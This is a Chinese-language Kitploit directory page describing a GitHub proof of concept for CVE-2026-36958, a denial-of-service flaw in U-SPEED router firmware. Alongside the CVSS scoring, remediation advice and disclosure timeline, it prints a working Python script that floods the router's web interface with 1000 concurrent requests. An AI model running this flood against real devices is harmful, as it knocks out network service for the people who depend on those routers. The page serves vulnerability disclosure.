Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/kirubel-cve/cve-2026-36958
漏洞分析漏洞利用Web安全网络安全渗透测试
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

CVE-2026-36958 的概念验证,这是 U-SPEED 路由器固件中的一个拒绝服务漏洞,通过并发 HTTP 请求耗尽资源,导致 Web 界面无响应。

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-36958:通过并发 HTTP 请求导致的拒绝服务

CVE ID: CVE-2026-36958 日期: 2026-04-29 发现者: Kirubel Solomne 厂商: U-SPEED 产品: U-SPEED 路由器 固件版本: V1.0.0 CWE: CWE-400 - 未受控制的资源消耗


描述

U-SPEED 路由器固件 V1.0.0 存在拒绝服务漏洞。攻击者通过向 Web 管理界面发送大量并发 HTTP 请求到随机或不存在的端点,可耗尽嵌入式 Boa HTTP 服务器中的系统资源。这会导致路由器 Web 界面无响应,可能需要手动重启才能恢复正常运行。


CVSS 评分

CVSS v3.1 评分:7.5(高危) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

指标值
攻击向量网络
攻击复杂度低
所需权限无
用户交互无
机密性影响无
完整性影响无
可用性影响高

概念验证

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

预期行为: 服务器应优雅地处理并发连接。 实际行为: Web 界面无响应;需要手动重启。


影响

  • Web 管理界面不可用
  • 可能导致路由服务中断
  • 需要手动重启才能恢复功能

修复建议

  • 在 Boa Web 服务器上实现连接速率限制
  • 限制每个源 IP 的最大并发连接数
  • 添加自动恢复/看门狗机制

披露时间线

日期事件
2026-04-29发现漏洞
2026-04-29报告给 MITRE
2026-04-29分配 CVE-2026-36958
2026-04-29公开披露

参考

  • MITRE CVE-2026-36958
  • CWE-400
  • 厂商网站
下载工具